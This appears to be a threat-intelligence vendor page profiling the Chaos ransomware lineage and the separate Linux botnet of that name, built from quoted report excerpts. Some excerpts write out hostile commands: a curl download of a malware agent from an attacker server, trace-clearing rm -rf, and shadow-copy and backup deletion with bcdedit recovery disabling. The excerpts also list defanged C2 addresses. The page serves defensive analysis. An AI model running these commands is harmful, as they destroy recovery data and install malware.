Chaos is a malware family name most commonly associated with a builder-based ransomware lineage first seen in 2021, but it has also been used for a distinct Go-based Linux botnet malware family. The ransomware lineage is a .NET-based family sold via a builder that enabled low-skill operators to generate customized payloads with tailored ransom notes, file extensions, and related options. Multiple later families, including Yashma, BlackSnake, and Spectra, have been assessed as derived from or evolved from Chaos code. Early Chaos ransomware variants were notably destructive: rather than reliably encrypting all files, they encrypted only smaller files and overwrote larger files with random data, making them functionally closer to wipers in many cases. Later variants used AES for file encryption and RSA to protect per-file keys, copied themselves into user profile locations for relaunch, dropped ransom notes, changed desktop wallpaper, and attempted to inhibit recovery by deleting shadow copies and backup catalogs and modifying boot recovery settings. Some descendants added persistence, language-based execution exclusions, lateral movement across network drives, and even cryptocurrency clipboard hijacking. Chaos-branded activity has also been used as false-flag cover by state-linked operators, including MuddyWater, to disguise espionage, credential theft, persistence, and data exfiltration as criminal ransomware activity.
Separately, Chaos is also the name of a Go-based Linux malware family linked by researchers to the Kaiji ecosystem. That Linux variant historically targeted routers and later Linux server environments, including cloud-exposed systems. It has been associated with DDoS botnet activity, persistence through system services, brute-force and exploitation-based propagation in earlier versions, and more recent SOCKS5 proxy functionality that can support traffic relaying and post-compromise pivoting. Because the same name is used for materially different malware families, attribution and classification require care. In mainstream defensive and incident-response usage, however, Chaos most often refers to the ransomware family and its descendants.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
7 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
MuddyWater, a hacking and cyber espionage group associated with Iran’s Ministry of Intelligence and Security, posed as the Chaos ransomware group to hide its espionage activity.
Dans plusieurs incidents, l’accès établi a été exploité pour déployer le ransomware Chaos, combinant exfiltration de données et chiffrement.
While the Chaos ransomware variant copied itself to $ user \ $ appdata \ cmd . exe and launched a new process, the new process in turn created a new file in the startup folder.
We also found that in some cases, attackers used a Trojan made from a leaked builder for the Chaos ransomware to encrypt files.
The CyberVolk collective is a prime example of how readily threat actors can access and deploy dangerous ransomware builders such as AzzaSec, Diamond, LockBit, Chaos and others.
A newly emerged ransomware-as-a-service (RaaS) gang called Chaos is likely made up of former members of the BlackSuit crew... Chaos, which sprang forth in February 2025...
38 distinct techniques documented for this family, organized by ATT&CK tactic.
Ransomware operators continued to rely on a consistent set of Tactics, Techniques, and Procedures (TTPs), including exploitation of internet-facing edge devices and remote management tooling, abuse of valid accounts, credential theft.
Version 1.0; released on 9 June 2021: Replaces file data with random bytes and then encodes it with Base-64. From the outset, it has worming capability, distributing itself to all drives.
the winning vulnerability (Chaos) has been aggressively used to target Uyghurs
TTPs based on MITRE ATT&CK Framework: Sr No. Tactic Technique 2 Execution (TA0002) T1106: Native API T1059.003: Windows Command Shell
This, in turn, initiates several shell commands: curl ... chmod 777 ... ./7c49006c2e417f20c732409ead2d6cc0. ... rm -rf ...
TTPs based on MITRE ATT&CK Framework: Sr No. Tactic Technique 2 Execution (TA0002) T1106: Native API
In Darktrace’s honeypot environment, the Hadoop instance is intentionally misconfigured to allow attackers to achieve remote code execution on the service. The attack began when a threat actor sent a request to an endpoint on the Hadoop deployment to create a new application.
Ransomware operators continued to rely on a consistent set of Tactics, Techniques, and Procedures (TTPs), including exploitation of internet-facing edge devices and remote management tooling, abuse of valid accounts, credential theft.
Ransomware operators continued to rely on a consistent set of Tactics, Techniques, and Procedures (TTPs), including exploitation of internet-facing edge devices and remote management tooling, abuse of valid accounts, credential theft.
TTPs based on MITRE ATT&CK Framework: Sr No. Tactic Technique 4 Defensive Evasion (TA0005) T1027: Obfuscated Files or Information
If not already running, it drops a copy at the below location and then executes itself. “C:\Users\\AppData\Roaming\svchost.exe”
rm -rf 7c49006c2e417f20c732409ead2d6cc0. - deletes the malware file from the disk to reduce traces of activity.
Post-compromise activity frequently involved disabling endpoint security tools and harvesting credentials stored in browsers before ransomware deployment.
TTPs based on MITRE ATT&CK Framework: Sr No. Tactic Technique 1 Discovery (TA0007) T1016: System Network Configuration Discovery
TTPs based on MITRE ATT&CK Framework: Sr No. Tactic Technique 1 Discovery (TA0007) T1016: System Network Configuration Discovery T1083: File and Directory Discovery T1135: Network Share Discovery T1049: System Network Connections Discovery
Embedded C2s: quanquandd[.]top:8888 linuxddos[.]net:2323 ai.nqb001[.]com:7812 tomca1[.]com:10099 ... Staging C2s (September 2022) 154.211.21[.]221 154.19.202[.]14 ...
When the malware receives a StartProxy command from the command-and-control (C2) server, it will begin listening on an attacker-controlled TCP port and operates as a SOCKS5 proxy.
Examples include 'Chaos provides a reverse shell connection on 8338/TCP, encrypted via AES,' 'Winnti for Linux has used a custom TCP protocol with four-byte XOR for command and control,' and 'XCSSET uses RC4 encryption over TCP to communicate with its C2 server.'
curl -L -O http://pan.tenire[.]com/down.php/7c49006c2e417f20c732409ead2d6cc0. - downloads a file from the attacker’s server, in this case a Chaos agent malware executable.
Multiple groups gained access by contacting employees via Microsoft Teams, posing as internal IT support, then guiding the target through a screen-sharing session to install a Remote Monitoring and Management (RMM) tool, such as AnyDesk/QuickAssist, or to execute a delivered payload.
Dans plusieurs incidents, l’accès établi a été exploité pour déployer le ransomware Chaos , combinant exfiltration de données et chiffrement.
Unlike most ransomware, wipers overwrite or remove the data from the victim’s systems... In our analysis we have seen Chaos encrypting files of less than 2 MB but overwriting larger files with random bytes. Because of this behavior, we believe it is more accurate to call it a wiper.
Этот крипто-вымогатель шифрует данные пользователей с помощью AES (режим GCM или похожий) + RSA-2048... К зашифрованным файлам добавляется расширение: .Void
TTPs based on MITRE ATT&CK Framework: Sr No. Tactic Technique 6 Impact (TA0040) T1486: Data Encrypted for impact T1489: Service Stop
The ransomware deletes the shadow copies and backup, while also disabling the recovery mode and task manager. vssadmin delete shadows /all /quiet & wmic shadowcopy delete bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no wbadmin delete catalog -quiet
268 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
85 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced as prior malware that abused Chrome DevTools Protocol to hide command-and-control communications.
Mentioned only in related content as the ransomware strain from which Yashma derives.
Mentioned only in related articles, not part of the main incident discussed.
A ransomware brand associated with two distinct tracks in the quarter: a conventional financially motivated RaaS operation and a separate state-sponsored espionage campaign using Chaos branding as cover rather than true encryption-led extortion.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.